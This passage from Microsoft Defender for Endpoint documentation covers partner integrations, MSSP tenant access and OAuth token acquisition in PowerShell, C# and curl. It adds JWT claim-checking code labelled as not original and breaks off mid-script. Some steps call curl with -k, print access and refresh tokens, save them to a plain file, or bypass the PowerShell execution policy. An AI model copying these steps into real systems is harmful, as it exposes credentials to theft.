IoC indicator ingestion and matching
Automated device investigation and remediation based on external alerts
Integration with security orchestration and automation response (SOAR) systems

Supported applications

Security information and analytics

Partner name | Description
AttackIQ Platform | AttackIQ Platform validates that Defender for Endpoint is configured properly by safely launching continuous attacks on production assets
AzureSentinel | Stream alerts from Microsoft Defender for Endpoint into Microsoft Sentinel
Cymulate | Correlate Defender for Endpoint findings with simulated attacks to validate accurate detection and effective response actions
Elastic Security | Elastic Security is a free and open solution for preventing, detecting, and responding to threats
IBM QRadar | Configure IBM QRadar to collect detections from Defender for Endpoint
Micro Focus ArcSight | Use Micro Focus ArcSight to pull Defender for Endpoint detections
RSA NetWitness | Stream Defender for Endpoint alerts to RSA NetWitness using the Microsoft Graph Security API
SafeBreach | Gain visibility into Defender for Endpoint security events that are automatically correlated with SafeBreach simulations
Skybox Vulnerability Control | Skybox Vulnerability Control cuts through the noise of vulnerability management, correlating business, network, and threat context to uncover your riskiest vulnerabilities
Splunk | The Defender for Endpoint Add-on allows Splunk users to ingest all of the alerts and supporting information into their Splunk
XM Cyber | Prioritize your response to an alert based on risk factors and high value assets

Orchestration and automation

Partner name | Description
Fortinet FortiSOAR | Fortinet FortiSOAR is a holistic Security Orchestration, Automation and Response (SOAR) workbench, designed for SOC teams to efficiently respond to the ever-increasing influx of alerts, repetitive manual processes, and shortage of resources. It pulls together all of an organization's tools, helps unify operations and reduces alert fatigue, context switching, and the mean time to respond to incidents.
Delta Risk ActiveEye | Delta Risk, a leading provider of SOC-as-a-Service and security services, integrates Defender for Endpoint with its cloud-native SOAR platform, ActiveEye.
Demisto, a Palo Alto Networks Company | Demisto integrates with Defender for Endpoint to enable security teams to orchestrate and automate endpoint security monitoring, enrichment, and response
Microsoft Flow & Azure Functions | Use the Defender for Endpoint connectors for Azure Logic Apps & Microsoft Flow to automate security procedures
Rapid7 InsightConnect | InsightConnect integrates with Defender for Endpoint to accelerate, streamline, and integrate your time-intensive security processes
ServiceNow | Ingest alerts into the ServiceNow Security Operations solution based on the Microsoft Graph API integration
Swimlane | Maximize incident response capabilities by utilizing Swimlane and Defender for Endpoint together

Threat intelligence

Partner name | Description
MISP (Malware Information Sharing Platform) | Integrate threat indicators from the Open Source Threat Intelligence Sharing Platform into your Defender for Endpoint environment
Palo Alto Networks | Enrich your endpoint protection by extending Autofocus and other threat feeds to Defender for Endpoint using MineMeld
ThreatConnect | Alert and/or block on custom threat intelligence from ThreatConnect Playbooks using Defender for Endpoint indicators

Network security

Partner name | Description
Aruba ClearPass Policy Manager | Ensure Defender for Endpoint is installed and updated on each endpoint before allowing access to the network
Blue Hexagon for Network | Blue Hexagon has built the industry's first real-time deep learning platform for network threat protection
CyberMDX | CyberMDX integrates comprehensive healthcare asset visibility, threat prevention and response into your Defender for Endpoint environment
HYAS Protect | HYAS Protect utilizes authoritative knowledge of attacker infrastructure to proactively protect Microsoft Defender for Endpoint endpoints from cyberattacks
Vectra Network Detection and Response (NDR) | Vectra applies AI & security research to detect and respond to cyber-attacks in real time

Cross platform

Partner name | Description
Bitdefender | Bitdefender GravityZone is a layered next generation endpoint protection platform offering comprehensive protection against the full spectrum of sophisticated cyber threats
Better Mobile | AI-based MTD solution to stop mobile threats & phishing. Private internet browsing to protect user privacy
Corrata | Mobile solution - Protect your mobile devices with granular visibility and control from Corrata
Lookout | Get Lookout Mobile Threat Protection telemetry for Android and iOS mobile devices
Symantec Endpoint Protection Mobile | SEP Mobile helps businesses predict, detect, and prevent security threats and vulnerabilities on mobile devices
Zimperium | Extend your Defender for Endpoint to iOS and Android with Machine Learning-based Mobile Threat Defense

Other integrations

Cyren Web Filter: Enhance your Defender for Endpoint with advanced Web Filtering

Morphisec: Provides Moving Target Defense-powered advanced threat prevention. Integrates forensics data directly into WD Defender for Cloud dashboards to help prioritize alerts, determine device at-risk score and visualize full attack timeline including internal memory information

THOR Cloud: Provides on-demand live forensics scans using a signature base with focus on persistent threats

SIEM integration
Defender for Endpoint supports SIEM integration through a variety of methods. These
include a specialized SIEM system interface with out-of-the-box connectors, a generic
alert API enabling custom implementations, and an action API enabling alert status
management.

Ticketing and IT service management
Ticketing solution integration helps to implement manual and automatic response
processes. Defender for Endpoint can help to create tickets automatically when an alert
is generated and resolve the alerts when tickets are closed using the alerts API.

Security orchestration and automation response (SOAR) integration
Orchestration solutions can help build playbooks and integrate the rich data model and
actions that the Defender for Endpoint APIs expose to orchestrate responses, such as
querying for device data, triggering device isolation, blocking or allowing, resolving an
alert, and others.

External alert correlation and automated investigation and remediation
Defender for Endpoint offers unique automated investigation and remediation
capabilities to drive incident response at scale.

Integrating the automated investigation and response capability with other solutions
such as IDS and firewalls helps to address alerts and minimize the complexities
surrounding network and device signal correlation, effectively streamlining the
investigation and threat remediation actions on devices.

External alerts can be pushed to Defender for Endpoint. These alerts are shown side by
side with additional device-based alerts from Defender for Endpoint. This view provides
the full context of the alert and can reveal the full story of an attack.

Indicators matching
You can use threat intelligence from providers and aggregators to maintain and use
indicators of compromise (IoCs).

Defender for Endpoint allows you to integrate with these solutions and act on IoCs by
correlating rich telemetry to create alerts. You can also use prevention and automated
response capabilities to block execution and take remediation actions when there's a
match.

Defender for Endpoint currently supports IoC matching and remediation for file and
network indicators. Blocking is supported for file indicators.

Support for non-Windows platforms
Defender for Endpoint provides a centralized security operations experience for
Windows and non-Windows platforms, including mobile devices. You'll be able to see
alerts from various supported operating systems (OS) in the portal and better protect
your organization's network.

Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community.


Connected applications in Microsoft Defender for Endpoint
Article • 10/20/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Defender for Endpoint? Sign up for a free trial.

Connected applications integrate with the Defender for Endpoint platform using APIs.

Applications use the standard OAuth 2.0 protocol to authenticate and provide tokens for
use with Microsoft Defender for Endpoint APIs. In addition, Microsoft Entra applications
allow tenant admins to set explicit control over which APIs can be accessed using the
corresponding app.

You'll need to follow these steps to use the APIs with the connected application.

From the left navigation menu, select Partners & APIs (under Endpoints) > Connected
applications.

View connected application details

The Connected applications page provides information about the Microsoft Entra
applications connected to Microsoft Defender for Endpoint in your organization. You
can review the usage of the connected applications: last seen, number of requests in the
past 24 hours, and request trends in the last 30 days.

Edit, reconfigure, or delete a connected application
The Open application settings link opens the corresponding Microsoft Entra application
management page in the Azure portal. From the Azure portal, you can manage
permissions, reconfigure, or delete the connected applications.



API Explorer
Article • 09/27/2023

Applies to:

Microsoft Defender for Endpoint Plan 2

The Microsoft Defender for Endpoint API Explorer is a tool that helps you explore
various Defender for Endpoint APIs interactively.

The API Explorer makes it easy to construct and run API queries, test, and send requests
for any available Defender for Endpoint API endpoint. Use the API Explorer to take
actions or find data that might not yet be available through the user interface.

The tool is useful during app development. It allows you to perform API queries that
respect your user access settings, reducing the need to generate access tokens.

You can also use the tool to explore the gallery of sample queries, copy result code
samples, and generate debug information.

With the API Explorer, you can:

Run requests for any method and see responses in real time.
Quickly browse through the API samples and learn what parameters they support.
Make API calls with ease; no need to authenticate beyond the management portal
sign-in.

Access API Explorer

From the left navigation menu, select Partners & APIs > API Explorer.

Supported APIs
API Explorer supports all the APIs offered by Defender for Endpoint.

The list of supported APIs is available in the APIs documentation.

Get started with the API Explorer

1. In the left pane, there's a list of sample requests that you can use.
2. Follow the links and click Run query.

Some of the samples may require specifying a parameter in the URL, for example,
{machine-ID}.

FAQ
Do I need to have an API token to use the API Explorer?
Credentials to access an API aren't needed. The API Explorer uses the Defender for
Endpoint management portal token whenever it makes a request.

The logged-in user authentication credential is used to verify that the API Explorer is
authorized to access data on your behalf.

Specific API requests are limited based on your RBAC privileges. For example, a request
to "Submit indicator" is limited to the security admin role.



Configure managed security service provider integration
Article • 02/16/2024

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Defender for Endpoint? Sign up for a free trial.

Important

Some information in this article relates to prerelease product, which may be
substantially modified before it's commercially released. Microsoft makes no
warranties, express or implied, with respect to the information provided here.

To enable the managed security service provider (MSSP) integration, follow the guidance
in this article.

Note

The following terms are used in this article to distinguish between the service
provider and service consumer:

MSSPs: Security organizations that offer to monitor and manage security
devices for an organization.
MSSP customers: Organizations that engage the services of MSSPs.

The integration allows MSSPs to take the following actions:

Get access to the MSSP customer's Microsoft Defender portal
Get email notifications, and
Fetch alerts through security information and event management (SIEM) tools

Before MSSPs can take these actions, the MSSP customer needs to grant access to their
Defender for Endpoint tenant so that the MSSP can access the portal.
Typically, MSSP customers take the initial configuration steps to grant MSSPs access to
their Windows Defender Security Center tenant. After access is granted, the MSSP or
customer can do the other configuration steps. In general, these are the configuration
steps to complete:

Step: Grant the MSSP access to Microsoft Defender XDR. This action grants the MSSP
access to the MSSP customer's Defender for Endpoint tenant.
Who does it: MSSP customer

Step: Configure alert notifications sent to MSSPs. This action lets the MSSPs know
what alerts they need to address for the MSSP customer.
Who does it: MSSP customer or MSSP

Step: Fetch alerts from the MSSP customer's tenant into a SIEM system. This action
allows MSSPs to fetch alerts in SIEM tools.
Who does it: MSSP

Step: Fetch alerts from the MSSP customer's tenant using APIs. This action allows
MSSPs to fetch alerts using APIs.
Who does it: MSSP

Multi-tenant access for MSSPs

For information on how to implement multitenant delegated access, see Multi-tenant
access for Managed Security Service Providers.

Related articles
Grant MSSP access to the portal
Access the MSSP customer portal
Configure alert notifications
Fetch alerts from customer tenant



Grant managed security service provider (MSSP) access (preview)
Article • 02/21/2024

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2

Want to experience Defender for Endpoint? Sign up for a free trial.

Important

Some information relates to prerelease product, which may be substantially
modified before it's commercially released. Microsoft makes no warranties, express
or implied, with respect to the information provided here.

To implement a multitenant delegated access solution, take the following steps:

1. Enable role-based access control in Defender for Endpoint and connect with Active
Directory (AD) groups.

2. Configure Governance Access Packages for access request and provisioning.

3. Manage access requests and audits in Microsoft Myaccess.

Enable role-based access controls in Microsoft Defender for Endpoint

1. Create access groups for MSSP resources in Customer AAD: Groups

These groups are linked to the Roles you create in Defender for Endpoint. To do so,
in the customer AD tenant, create three groups. In our example approach, we
create the following groups:

Tier 1 Analyst
Tier 2 Analyst
MSSP Analyst Approvers

2. Create Defender for Endpoint roles for appropriate access levels in Customer
Defender for Endpoint.

To enable RBAC in the customer Microsoft Defender portal, access Settings >
Endpoints > Permissions > Roles and "Turn on roles", from a user account with
Global Administrator or Security Administrator rights.

Then, create RBAC roles to meet MSSP SOC Tier needs. Link these roles to the
created user groups via "Assigned user groups".

Two possible roles:

Tier 1 Analysts

Perform all actions except for live response and manage security settings.

Tier 2 Analysts

Tier 1 capabilities with the addition of live response

For more information, see Use role-based access control.

Configure Governance Access Packages

1. Add MSSP as Connected Organization in Customer AAD: Identity Governance

Adding the MSSP as a connected organization allows the MSSP to request and
have access provisioned.

To do so, in the customer AD tenant, access Identity Governance: Connected
organization. Add a new organization and search for your MSSP Analyst tenant via
Tenant ID or Domain. We suggest creating a separate AD tenant for your MSSP
Analysts.

2. Create a resource catalog in Customer AAD: Identity Governance

Resource catalogs are a logical collection of access packages, created in the
customer AD tenant.

To do so, in the customer AD tenant, access Identity Governance: Catalogs, and
add New Catalog. In our example, it's called MSSP Accesses.

For more information, see Create a catalog of resources.

3. Create access packages for MSSP resources in Customer AAD: Identity Governance

Access packages are the collection of rights and accesses that a requestor is
granted upon approval.

To do so, in the customer AD tenant, access Identity Governance: Access Packages,
and add New Access Package. Create an access package for the MSSP approvers
and each analyst tier. For example, the following Tier 1 Analyst configuration
creates an access package that:

Requires a member of the AD group MSSP Analyst Approvers to authorize
new requests
Has annual access reviews, where the SOC analysts can request an access
extension
Can only be requested by users in the MSSP SOC Tenant
Access auto expires after 365 days

For more information, see Create a new access package.

4. Provide access request link to MSSP resources from Customer AAD: Identity
Governance

The My Access portal link is used by MSSP SOC analysts to request access via the
access packages created. The link is durable, meaning the same link may be used
over time for new analysts. The analyst request goes into a queue for approval by
the MSSP Analyst Approvers.

The link is located on the overview page of each access package.

Manage access
1. Review and authorize access requests in Customer and/or MSSP myaccess.

Access requests are managed in the customer My Access, by members of the
MSSP Analyst Approvers group.

To do so, access the customer's myaccess using:
https://myaccess.microsoft.com/@<Customer Domain>

Example: https://myaccess.microsoft.com/@M365x440XXX.onmicrosoft.com#/

2. Approve or deny requests in the Approvals section of the UI.

At this point, analyst access has been provisioned, and each analyst should be able
to access the customer's Microsoft Defender portal:
https://security.microsoft.com/?tid=<CustomerTenantId>

Related topics
Access the MSSP customer portal
Configure alert notifications
Fetch alerts from customer tenant


Access the Microsoft Defender XDR MSSP customer portal
Article • 10/20/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Important

Some information relates to prerelease product, which may be substantially
modified before it's commercially released. Microsoft makes no warranties, express
or implied, with respect to the information provided here.

Note

This set of steps is directed towards the MSSP.

By default, MSSP customers access their Microsoft Defender XDR tenant through the
following URL: https://security.microsoft.com/ .

MSSPs, however, will need to use a tenant-specific URL in the following format to
access the MSSP customer portal:
https://security.microsoft.com?tid=customer_tenant_id

In general, MSSPs will need to be added to the Microsoft Entra ID tenant of each MSSP
customer they intend to manage.

Use the following steps to obtain the MSSP customer tenant ID and then use the ID to
access the tenant-specific URL:

1. As an MSSP, log in to Microsoft Entra ID with your credentials.
2. Switch directory to the MSSP customer's tenant.
3. Select Microsoft Entra ID > Properties. You'll find the tenant ID in the Tenant ID
field.
4. Access the MSSP customer portal by replacing the customer_tenant_id value in the
following URL: https://security.microsoft.com/?tid=customer_tenant_id .
5. Access a Unified View for MSSP (Preview) in https://mto.security.microsoft.com/

Related topics
Grant MSSP access to the portal
Configure alert notifications
Fetch alerts from customer tenant



Configure alert notifications that are sent to MSSPs
Article • 07/18/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Defender for Endpoint? Sign up for a free trial.

Note

This step can be done by either the MSSP customer or the MSSP. MSSPs must be
granted the appropriate permissions to configure this on behalf of the MSSP
customer.

After access to the portal is granted, alert notification rules can be created so that
emails are sent to MSSPs when alerts associated with the tenant are created and the
set conditions are met.

For more information, see Create rules for alert notifications.

These check boxes must be checked:

Include organization name - The customer name will be added to email
notifications
Include tenant-specific portal link - The alert link URL will have a tenant-specific
parameter (tid=target_tenant_id) that allows direct access to the target tenant portal

Related topics
Grant MSSP access to the portal
Access the MSSP customer portal
Fetch alerts from customer tenant



Partner access through Microsoft Defender for Endpoint APIs
Article • 02/23/2024

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender for Business

Important

Advanced hunting capabilities are not included in Defender for Business.

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Note

If you are a US Government customer, please use the URIs listed in Microsoft
Defender for Endpoint for US Government customers.

Tip

For better performance, you can use the server closest to your geographic location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

This page describes how to create a Microsoft Entra application to get programmatic
access to Microsoft Defender for Endpoint on behalf of your customers.

Microsoft Defender for Endpoint exposes much of its data and actions through a set of
programmatic APIs. Those APIs help you automate workflows and innovate based on
Microsoft Defender for Endpoint capabilities. API access requires OAuth 2.0
authentication. For more information, see OAuth 2.0 Authorization Code Flow.
In general, you need to take the following steps to use the APIs:

Create a multi-tenant Microsoft Entra application.
Get authorization (consent) from your customer's administrator for your application
to access the Defender for Endpoint resources it needs.
Get an access token using this application.
Use the token to access the Microsoft Defender for Endpoint API.

The following steps guide you through creating a Microsoft Entra application, getting
an access token for Microsoft Defender for Endpoint, and validating the token.

Create the multitenant app

1. Sign in to your Azure tenant with a user that has the Global Administrator role.

2. Navigate to Microsoft Entra ID > App registrations > New registration.

3. In the registration form:

Choose a name for your application.

Supported account types - accounts in any organizational directory.

Redirect URI - type: Web, URI: https://portal.azure.com


4. Allow your application to access Microsoft Defender for Endpoint and assign it
the minimal set of permissions required to complete the integration.

On your application page, select API Permissions > Add permission > APIs
my organization uses > type WindowsDefenderATP and select
WindowsDefenderATP.

Note that WindowsDefenderATP doesn't appear in the original list. Start
writing its name in the text box to see it appear.

Request API permissions

To determine which permission you need, review the Permissions section of the API
you're interested in calling. For instance:

To run advanced queries, select the 'Run advanced queries' permission
To isolate a device, select the 'Isolate machine' permission

In the following example we use 'Read all alerts' permission:

1. Choose Application permissions > Alert.Read.All > select Add permissions

2. Select Grant consent

Note: Every time you add a permission you must select Grant consent for
the new permission to take effect.

3. Add a secret to the application.

Select Certificates & secrets, add description to the secret and select Add.

Important: After you select Add, make sure to copy the generated secret value.
You won't be able to retrieve it after you leave!

4. Write down your application ID:

On your application page, go to Overview and copy the following
information:

5. Add the application to your customer's tenant.

You need your application to be approved in each customer tenant where you
intend to use it. This approval is necessary because your application interacts with
the Microsoft Defender for Endpoint application on behalf of your customer.

A user with the Global Administrator role in your customer's tenant needs to select
the consent link and approve your application.
The consent link is of the form:

HTTP

https://login.microsoftonline.com/common/oauth2/authorize?prompt=consent&client_id=00000000-0000-0000-0000-000000000000&response_type=code&sso_reload=true

Where 00000000-0000-0000-0000-000000000000 should be replaced with your
Application ID.

After clicking the consent link, sign in with the Global Administrator of the
customer's tenant and consent to the application.

In addition, you'll need to ask your customer for their tenant ID and save it for
future use when acquiring the token.

6. Done! You successfully registered an application! See the following examples for
token acquisition and validation.

Get an access token example

Note: To get an access token on behalf of your customer, use the customer's tenant ID in
the following token acquisitions.

For more information on Microsoft Entra token, see Microsoft Entra tutorial.

Using PowerShell
PowerShell

# This code gets the App Context Token and saves it to a file named "Latest-token.txt"
# under the current directory.
# Paste below your Tenant ID, App ID and App Secret (App key).

$tenantId = '' ### Paste your tenant ID here
$appId = '' ### Paste your Application ID here
$appSecret = '' ### Paste your Application key here

$resourceAppIdUri = 'https://api.securitycenter.microsoft.com'
$oAuthUri = "https://login.microsoftonline.com/$tenantId/oauth2/token"
$authBody = [Ordered] @{
    resource = "$resourceAppIdUri"
    client_id = "$appId"
    client_secret = "$appSecret"
    grant_type = 'client_credentials'
}
$authResponse = Invoke-RestMethod -Method Post -Uri $oAuthUri -Body $authBody -ErrorAction Stop
$token = $authResponse.access_token
Out-File -FilePath "./Latest-token.txt" -InputObject $token
return $token

Using C#
The code below was tested with the NuGet package Microsoft.Identity.Client.

Important

The Microsoft.IdentityModel.Clients.ActiveDirectory NuGet package and Azure
AD Authentication Library (ADAL) have been deprecated. No new features have
been added since June 30, 2020. We strongly encourage you to upgrade; see the
migration guide for more details.

Create a new Console Application

Install the NuGet package Microsoft.Identity.Client

Add the following using directive

Console

using Microsoft.Identity.Client;

Copy/paste the code below into your application (don't forget to update the three
variables: tenantId , appId , and appSecret )

C#

string tenantId = "00000000-0000-0000-0000-000000000000"; // Paste your own tenant ID here
string appId = "11111111-1111-1111-1111-111111111111"; // Paste your own app ID here
string appSecret = "22222222-2222-2222-2222-222222222222"; // Paste your own app secret here for a test, and then store it in a safe place!
const string authority = "https://login.microsoftonline.com";
const string audience = "https://api.securitycenter.microsoft.com";

IConfidentialClientApplication myApp = ConfidentialClientApplicationBuilder.Create(appId)
    .WithClientSecret(appSecret)
    .WithAuthority($"{authority}/{tenantId}")
    .Build();

List<string> scopes = new List<string>() { $"{audience}/.default" };

AuthenticationResult authResult = myApp.AcquireTokenForClient(scopes).ExecuteAsync().GetAwaiter().GetResult();

string token = authResult.AccessToken;

Using Python
Refer to Get token using Python.

Using Curl
Note

The procedure below assumes curl for Windows is already installed on your
computer.

1. Open a command window.

2. Set CLIENT_ID to your Azure application ID.

3. Set CLIENT_SECRET to your Azure application secret.

4. Set TENANT_ID to the Azure tenant ID of the customer that wants to use your
application to access Microsoft Defender for Endpoint application.

5. Run the following command:

curl

curl -i -X POST -H "Content-Type:application/x-www-form-urlencoded" -d "grant_type=client_credentials" -d "client_id=%CLIENT_ID%" -d "scope=https://securitycenter.onmicrosoft.com/windowsatpservice/.default" -d "client_secret=%CLIENT_SECRET%" "https://login.microsoftonline.com/%TENANT_ID%/oauth2/v2.0/token" -k

You get an answer of the form:

Console

{"token_type":"Bearer","expires_in":3599,"ext_expires_in":0,"access_token":"eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIn <truncated> aWReH7P0s0tjTBX8wGWqJUdDA"}

Validate the token

Confirm you received a correct token.

1. Copy/paste the token you got in the previous step into JWT in order to decode
it.

2. Confirm you get a 'roles' claim with the desired permissions.

In the following screenshot, you can see a decoded token acquired from an
application with multiple permissions to Microsoft Defender for Endpoint:

The "tid" claim is the tenant ID the token belongs to.
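The two checks above (a 'roles' claim carrying the permissions you granted, and a 'tid' claim naming the customer tenant) can be scripted for an app-only token instead of pasting it into a decoder. The following is an added Python example, not code from the original article or from Microsoft: it splits the compact JWT, reads the claims without verifying the signature, and flags missing or unexpected roles, a wrong tenant, a wrong audience, and an expired token. The tenant ID, the extra role name in the test and the sample token are constructed placeholders; Alert.Read.All is the permission used in the example above, and 'aud' is compared with the api.securitycenter.microsoft.com resource named in the token scripts.

```python
import base64
import json
import time

# Constructed placeholder values (not real identifiers): the customer tenant the
# token was acquired for, the Defender for Endpoint resource the token scripts
# request, and the one application permission granted in the example above.
CUSTOMER_TENANT_ID = "00000000-0000-0000-0000-000000000000"
EXPECTED_AUDIENCE = "https://api.securitycenter.microsoft.com"
REQUIRED_ROLES = {"Alert.Read.All"}


def _b64url_decode(segment: str) -> bytes:
    """Decode one base64url JWT segment; JWTs strip '=' padding, so restore it."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def _b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def decode_jwt_claims(token: str) -> dict:
    """Return the payload claims of a compact JWT without verifying its signature.

    This is what a decoder site does when you paste the token in: it lets you
    read the claims. It does not prove the token is genuine; the API verifies
    the signature when the token is presented.
    """
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("expected three dot-separated segments: header.payload.signature")
    header = json.loads(_b64url_decode(parts[0]))
    if header.get("typ") != "JWT":
        raise ValueError("header 'typ' is not JWT")
    return json.loads(_b64url_decode(parts[1]))


def check_app_token(token, tenant_id, required_roles, audience, now=None):
    """Check an app-only token against what the validation step says to confirm.

    Returns a list of problems (an empty list means the token looks right):
      - the 'roles' claim carries every permission you granted, and no more
        (extra roles mean the app holds more privilege than this integration needs),
      - 'tid' is the customer tenant the token was acquired for,
      - 'aud' is the Defender for Endpoint resource, and
      - 'exp' has not passed (tokens are valid for about an hour).
    """
    claims = decode_jwt_claims(token)
    now = int(time.time()) if now is None else now
    problems = []
    roles = set(claims.get("roles", []))
    missing = required_roles - roles
    if missing:
        problems.append(f"missing roles: {sorted(missing)}")
    extra = roles - required_roles
    if extra:
        problems.append(f"unexpected extra roles: {sorted(extra)}")
    if claims.get("tid") != tenant_id:
        problems.append(f"tid {claims.get('tid')!r} is not the customer tenant {tenant_id!r}")
    if claims.get("aud") != audience:
        problems.append(f"aud {claims.get('aud')!r} is not {audience!r}")
    if int(claims.get("exp", 0)) <= now:
        problems.append("token is expired")
    return problems


def make_sample_token(claims: dict) -> str:
    """Build a sample token for offline testing.

    Constructed here for the example: the header mimics the shape of a real
    token and the signature is a placeholder, so no service will accept it.
    """
    header = _b64url_encode(json.dumps({"typ": "JWT", "alg": "RS256"}).encode())
    payload = _b64url_encode(json.dumps(claims).encode())
    signature = _b64url_encode(b"placeholder-signature-not-valid")
    return f"{header}.{payload}.{signature}"


if __name__ == "__main__":
    sample = make_sample_token({
        "aud": EXPECTED_AUDIENCE,
        "tid": CUSTOMER_TENANT_ID,
        "roles": ["Alert.Read.All"],
        "exp": int(time.time()) + 3599,
    })
    print("claims:", decode_jwt_claims(sample))
    print("problems:", check_app_token(sample, CUSTOMER_TENANT_ID, REQUIRED_ROLES, EXPECTED_AUDIENCE))
```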


Use the token to access the Microsoft Defender for Endpoint API
1. Choose the API you want to use. For more information, see Supported Microsoft
Defender for Endpoint APIs.
2. Set the Authorization header in the HTTP request you send to "Bearer {token}"
(Bearer is the Authorization scheme). The token expires after 1 hour (you can send
more than one request with the same token).

Here's an example of sending a request to get a list of alerts using C#

C#

using System.Net.Http;
using System.Net.Http.Headers;

var httpClient = new HttpClient();

var request = new HttpRequestMessage(HttpMethod.Get, "https://api.securitycenter.microsoft.com/api/alerts");

request.Headers.Authorization = new AuthenticationHeaderValue("Bearer", token);

var response = httpClient.SendAsync(request).GetAwaiter().GetResult();

// Do something useful with the response

See also
Supported Microsoft Defender for Endpoint APIs
Access Microsoft Defender for Endpoint on behalf of a user



Fetch alerts from MSSP customer tenant
Article • 11/15/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

7 Note

This action is taken by the MSSP.

There are two ways you can fetch alerts:

Using the SIEM method
Using APIs

Fetch alerts into your SIEM

To fetch alerts into your SIEM system, you'll need to take the following steps:

Step 1: Create a third-party application
Step 2: Get access and refresh tokens from your customer's tenant
Step 3: Allow your application on Microsoft Defender XDR

Step 1: Create an application in Microsoft Entra ID

You'll need to create an application and grant it permissions to fetch alerts from your
customer's Microsoft Defender XDR tenant.

1. Sign in to the Microsoft Entra admin center .

2. Select Microsoft Entra ID > App registrations.

3. Click New registration.

4. Specify the following values:

Name: <Tenant_name> SIEM MSSP Connector (replace Tenant_name with the
tenant display name)
Supported account types: Account in this organizational directory only
Redirect URI: Select Web and type
https://<domain_name>/SiemMsspConnector (replace <domain_name> with the
tenant name)

5. Click Register. The application is displayed in the list of applications you own.

6. Select the application, then click Overview.

7. Copy the value from the Application (client) ID field to a safe place, you will need
this in the next step.

8. Select Certificates & secrets in the new application panel.

9. Click New client secret.

Description: Enter a description for the key.
Expires: Select In 1 year

10. Click Add, then copy the value of the client secret to a safe place; you will need this
in the next step.

Step 2: Get access and refresh tokens from your customer's tenant
This section guides you on how to use a PowerShell script to get the tokens from your
customer's tenant. This script uses the application from the previous step to get the
access and refresh tokens using the OAuth Authorization Code Flow.

After providing your credentials, you'll need to grant consent to the application so that
the application is provisioned in the customer's tenant.

1. Create a new folder and name it: MsspTokensAcquisition .

2. Download the LoginBrowser.psm1 module and save it in the
MsspTokensAcquisition folder.

Note

In line 30, replace authorzationUrl with authorizationUrl .

3. Create a file with the following content and save it with the name
MsspTokensAcquisition.ps1 in the folder:
PowerShell

param (
    [Parameter(Mandatory=$true)][string]$clientId,
    [Parameter(Mandatory=$true)][string]$secret,
    [Parameter(Mandatory=$true)][string]$tenantId
)
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12

# Load our Login Browser Function
Import-Module .\LoginBrowser.psm1

# Configuration parameters
$login = "https://login.microsoftonline.com"
$redirectUri = "https://SiemMsspConnector"
$resourceId = "https://graph.windows.net"

Write-Host 'Prompt the user for his credentials, to get an authorization code'
$authorizationUrl = ("{0}/{1}/oauth2/authorize?prompt=select_account&response_type=code&client_id={2}&redirect_uri={3}&resource={4}" -f
                     $login, $tenantId, $clientId, $redirectUri, $resourceId)
Write-Host "authorizationUrl: $authorizationUrl"

# Fake a proper endpoint for the Redirect URI
$code = LoginBrowser $authorizationUrl $redirectUri

# Acquire token using the authorization code
$Body = @{
    grant_type = 'authorization_code'
    client_id = $clientId
    code = $code
    redirect_uri = $redirectUri
    resource = $resourceId
    client_secret = $secret
}

$tokenEndpoint = "$login/$tenantId/oauth2/token?"
$Response = Invoke-RestMethod -Method Post -Uri $tokenEndpoint -Body $Body
$token = $Response.access_token
$refreshToken = $Response.refresh_token

Write-Host " ----------------------------------- TOKEN ---------------------------------- "
Write-Host $token

Write-Host " ----------------------------------- REFRESH TOKEN ---------------------------------- "
Write-Host $refreshToken

4. Open an elevated PowerShell command prompt in the MsspTokensAcquisition
folder.

5. Run the following command: Set-ExecutionPolicy -ExecutionPolicy Bypass

6. Enter the following command: .\MsspTokensAcquisition.ps1 -clientId
<client_id> -secret <app_key> -tenantId <customer_tenant_id>

Replace <client_id> with the Application (client) ID you got from the
previous step.
Replace <app_key> with the Client Secret you created in the previous
step.
Replace <customer_tenant_id> with your customer's Tenant ID.

7. You'll be asked to provide your credentials and consent. Ignore the page redirect.

8. In the PowerShell window, you'll receive an access token and a refresh token. Save
the refresh token to configure your SIEM connector.
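Before you hand the refresh token to the SIEM, check that the access token returned with it was issued by the customer tenant, for your MSSP application, for the resource the script asked for. The following PowerShell is an added example, not part of MsspTokensAcquisition.ps1 or of the Defender documentation: it decodes the token's claims locally (no network call; the token is never sent anywhere) and reports any mismatch. ConvertFrom-Base64Url, Get-JwtClaims, Test-MsspAccessToken and New-DemoJwt are hypothetical names, and the tenant ID, client ID and unsigned demo token used at the end are constructed for the demo.

```powershell
# Added example (not part of MsspTokensAcquisition.ps1): decode an access token's claims
# locally and confirm tenant, app and audience before the refresh token goes into the SIEM.

function ConvertFrom-Base64Url {
    param([Parameter(Mandatory)][string]$Text)
    # JWT segments are base64url: '-' and '_' instead of '+' and '/', and no '=' padding.
    $s = $Text.Replace('-', '+').Replace('_', '/')
    switch ($s.Length % 4) { 2 { $s += '==' } 3 { $s += '=' } }
    [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($s))
}

function Get-JwtClaims {
    param([Parameter(Mandatory)][string]$Token)
    $parts = $Token.Split('.')
    if ($parts.Count -ne 3) { throw 'Not a compact JWS (expected header.payload.signature)' }
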